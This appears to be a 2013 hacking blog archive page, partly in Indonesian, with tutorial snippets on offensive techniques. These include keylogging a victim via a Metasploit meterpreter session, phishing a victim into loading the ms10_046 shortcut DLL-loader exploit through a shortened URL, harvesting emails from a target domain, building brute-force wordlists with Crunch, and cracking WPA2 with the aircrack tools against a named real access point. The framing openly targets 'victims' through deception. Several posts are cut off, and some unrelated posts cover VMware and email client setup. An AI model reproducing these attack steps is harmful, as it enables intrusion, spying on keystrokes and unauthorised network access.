Posts

Showing posts from April, 2013

[Video] Activate Keylogger Using Metasploit - PART 1

Image
Today I will explain how to activate keylogger using metasploit, Note : we have to get meterpreter session to run keylogger after getting meterpreter, then we need to see what applications are being run by victim check this now. Author By: Hidemichi-Hiroyuki a.k.a [H2]

Exploit ShortCut_Icon_DLL-Loader + [Video]

Image
Apa yang harus kita jawab ketika victim bertanya : " Mengapa saya harus menuju alamat IP anda (Attacker) " yah, kita tidak dapat menjawab pertanyaan yang begitu simple dari victim, namun ada beberapa usaha dalam melakukan exploitasi untuk meyakinkan victim agar menuju ke IP si attacker. dalam exploitasi kali ini saya tidak menggunakan MITM untuk memancing attacker. Equipments: 1. msfconsole =>>  Run a Exploitation 2. goo.gl =>>  URL Shortener 3. alpine =>>  Send File to Victim Planning Example Saya melihat ada victim yg sedang mengaktifkan Email ==> kemudian saya mengirim file DLLloader kepada victim ==> dengan iming-iming yang tidak jelas saya membuat victim yakin agar mengklik url yg sudah kita shortener ==> saat victim membuka url tersebut, kita mendapatkan session meterpreter, Victim ! DEATH ! !! First Step Run Exploit: msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader msf exploit( ms1

Install VMware Workstation on Kali Linux

Image
Please following this step by step to installation VMware Workstation on Kali Linux. i have tried and then the results is very good =)) Download  please choose your need version. Change permission file to 775 Next, we call the file to be executed root@[H2]:~# ./VMware-Workstation-Full-9.0.2-1031769.i386.bundle look like the image below : next, choose Typical (recommended) and click next the next section, i choose "I will install the operation system later" i want install operation system windows, so i choose number one "Microsoft Windows" , and on the tab Version please choose your Operating System. look like this image below Next step, there are two options under Name : Original your Name Operation System Location : i choose default path to location VMware and then click Next . and  next step, set Disk Size for Operation system. look at the picture below, I give 35Gb and then i choose "Split virtual disk as a single fi

Harvest Email Collector

Image
I think, this is a simple way to get email from website right ? Oke. Now open your fuckin metasploit and then please following this command: msf > use auxiliary/gather/search_email_collector i'm need to show options: msf auxiliary( search_email_collector ) > show options I just need help to use DOMAIN =)) msf auxiliary( search_email_collector ) > set DOMAIN [your target] msf auxiliary( search_email_collector ) > exploit Please you waiting for scanning process to finish: very simple right ? Author By : Hidemichi-Hirroyuki a.k.a [H2]

Generate Wordlists Using Crunch

Image
Pada Operation System Kali Linux, Crunch telah dibuat dengan versi 3.4 Crunch sendiri dapat membantu kita dalam pembuatan wordlist berdasarkan kriteria yang kita inginkan untuk melakukan bruteforce dalam mengaudit kekuatan passwords. Output dari Crunch dapat di letakkan dan disimpan dalam berbagai format. Full options : -b  Maximum bytes to write per file, so using this option the wordlist to be created can be split into various       sizes such as KB / MB / GB (must be used in combination with "-o START" switch) -c  Number of lines to write to output file, must be used together with "-o START" -d  Limits the number of consecutive identical characters (crunch v3.2) -e Specifies when crunch should stop early (crunch v3.1) -f  Path to the charset.lst file to use, standard location is '/pentest/passwords/crunch/charset.lst     to be used in conjunction with the name of the desired charset list, such as 'mixalpha-numeric-space' -i  In

Get Password WPA2

Image
I think, this is not hard job =)) Please yours completed this equipment Equipment: 1. airmong-ng 2. airodump-ng 3. aireplay-ng  4. aircrack-ng Untuk melengkapi kebutuhan diatas, saya menyarankan anda untuk memakai System Operation Linux, dan disini saya memakai OS Kali-Linux. Back to topic: Firts Step: Mengaktifkan monitoring mode  'mon0' root@[H2]:~# airmon-ng start wlan0 terlihat pada bagian bawah , mode mon0 telah diaktifkan. Step two: Melihat jalur Access Point yang terekam root@[H2]:~# airodump-ng mon0 Setelah Access Point target terlihat, silahkan  Ctrl+c untuk stop mode yang menjadi target saya adalah: 64:70:02:F6:59:C4  -90   159    74   1   1  54e  WPA2 CCMP   PSK  ALAUDDINSYAH  Next Step: Mendapatkan Handshake target: root@[H2]:~# airodump-ng -c [channel target] -w [--write] --bssid [bssid target] --ivs mon0 NOTE: Perhatikan pada bagian  -w same as --write,  saya memberi nama Anonymous [anda bebas beri nama], ini na

Alpine Access E-mail

Image
Today, i'm think I will share how to configure alpine and how to use alpine send mailer ;) Install Alpine in your console: root@[H2]:~# apt-get install alpine terlihat pada gambar diatas, saya telah menginstalnya. mari kita mengeksekusi Alpine: root@[H2]:~#  alpine selanjutnya melakukan configurasi: pilih SETUP / S please choose Config: next step, set this section: Personal Name                           = Your Name User Domain                              = Your Domain SMTP Server (for sending)         = smtp.gmail.com:587/tls/user= Your Email Inbox Path                  =  {pop.gmail.com/pop3/ssl/novalidate-cert/user= Your Email }INBOX example: Personal Name                           =  Hidemichi-Hiroyuki User Domain                              =  gmail.com SMTP Server (for sending)         = smtp.gmail.com:587/tls/user= leo.script@gmail.com Inbox Path                 = {pop.gmail.com/pop3/ssl/novalidate-cert/user= leo.sc